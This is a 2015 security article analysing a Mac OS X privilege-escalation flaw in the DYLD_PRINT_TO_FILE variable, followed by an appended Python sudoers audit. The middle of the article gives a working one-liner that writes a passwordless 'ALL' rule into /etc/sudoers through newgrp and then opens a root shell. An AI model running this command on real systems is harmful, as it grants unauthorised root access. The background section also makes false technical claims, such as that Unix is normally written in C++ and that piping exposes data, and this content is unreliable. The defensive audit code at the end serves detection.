Research Team Analyse New Apple Mac Privileged Access Exploit

23/07/2015


The Cyber Academy research team have been analysing a new Mac OS X vulnerability which allows privileged (root) access on the latest version of Apple's operating system.

Many people think that the flaws now appearing are legacy ones, dating from a time when computer security was not a major concern. The Unix kernel is now showing its age, especially in the methods that were used to create the basic functionality of the system, and in the sloppiness of the developers.

So it is a bit of a shock that the latest one relates to an environment variable which was introduced in the latest version of Mac OS X (10.10): DYLD_PRINT_TO_FILE.

The problem is caused by Mac OS suffering from all the problems that Unix has, including:

  • Data piping. In Unix, programs often pipe data from the output of one program into the input of another. This leaves the data open to compromise.
  • C++. Unix operating systems normally use C++ as their core development language, and thus suffer from all the usual problems that C++ brings, including buffer overruns (where data runs into memory that was not allocated for it) and buffer underruns (where the data does not fill the space allocated to it, and is then read back on the assumption that it had).
  • Environment variables and scripting. These are global variables which are set by the operating system and are used by many system programs. Code can often be injected through these variables when they are used, often with administrator rights.

The code basically allows privileged root access to the system, and does this by using the DYLD_PRINT_TO_FILE environment variable to write the following line into /etc/sudoers:

ALL ALL=(ALL) NOPASSWD: ALL

/etc/sudoers is the file which defines who may act as a superuser on the system, and this line grants superuser access, without a password, to the user. A basic script is thus:

echo python -c '"import os;os.write(3,\"ALL ALL=(ALL) NOPASSWD: ALL\")"'|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;sudo su

In this case, newgrp is a privileged (setuid root) program, so when it is run the file named in DYLD_PRINT_TO_FILE, /etc/sudoers, is opened with superuser rights and the line above is written into it. Then "sudo su" is executed to provide access to a command-line shell with root-level privileges.
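From the defender's side, the trace this leaves behind is the sudoers rule itself. As an added example (not code from the original article or from the researchers), the following Python audit parses sudoers content and flags the exact rule written above, together with any other rule that grants ALL commands without a password. The sample file content is constructed, the parser assumes the usual "user host=(runas) TAG: commands" layout, and aliases are skipped rather than expanded.

```python
import re

# Constructed sample sudoers content (not taken from any real system):
# an ordinary file with the exact line written by the exploit appended.
SAMPLE_SUDOERS = """\
# sudoers file.
Defaults env_reset
Defaults secure_path="/usr/local/bin:/usr/bin:/bin"
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app, \\
                             /usr/bin/journalctl -u app
ALL ALL=(ALL) NOPASSWD: ALL
"""

# Assumed layout of a user specification: user host=(runas) [TAG:]... commands
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
                     r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$")
TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|"
                    r"LOG_INPUT|NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT):\s*")
SKIP_RE = re.compile(r"^(Defaults|\w+_Alias)\b")   # not user specifications

def logical_lines(text):
    """Join backslash-continued lines; drop blank lines and comments."""
    out, buf = [], ""
    for raw in text.splitlines() + [""]:       # trailing "" flushes a pending continuation
        line = raw.rstrip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        joined, buf = (buf + line).strip(), ""
        if joined and not joined.startswith("#"):
            out.append(joined)
    return out

def parse_rules(text):
    """Parse user specifications into dicts (aliases and Defaults are skipped)."""
    rules = []
    for line in logical_lines(text):
        m = None if SKIP_RE.match(line) else RULE_RE.match(line)
        if not m:
            continue
        rest, tags = m.group("rest"), set()
        t = TAG_RE.match(rest)
        while t:                                # peel off NOPASSWD:, SETENV:, ...
            tags.add(t.group(1))
            rest = rest[t.end():]
            t = TAG_RE.match(rest)
        rules.append({"user": m.group("user"), "host": m.group("host"),
                      "runas": m.group("runas") or "", "tags": tags,
                      "commands": [c.strip() for c in rest.split(",")]})
    return rules

def find_dangerous(text):
    """Rules that apply to every user, or grant ALL commands with no password."""
    return [r for r in parse_rules(text)
            if r["user"] == "ALL" or ("NOPASSWD" in r["tags"] and "ALL" in r["commands"])]
```

Running find_dangerous over the sample flags only the appended rule; the deploy rule is NOPASSWD but limited to two commands, so it passes.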

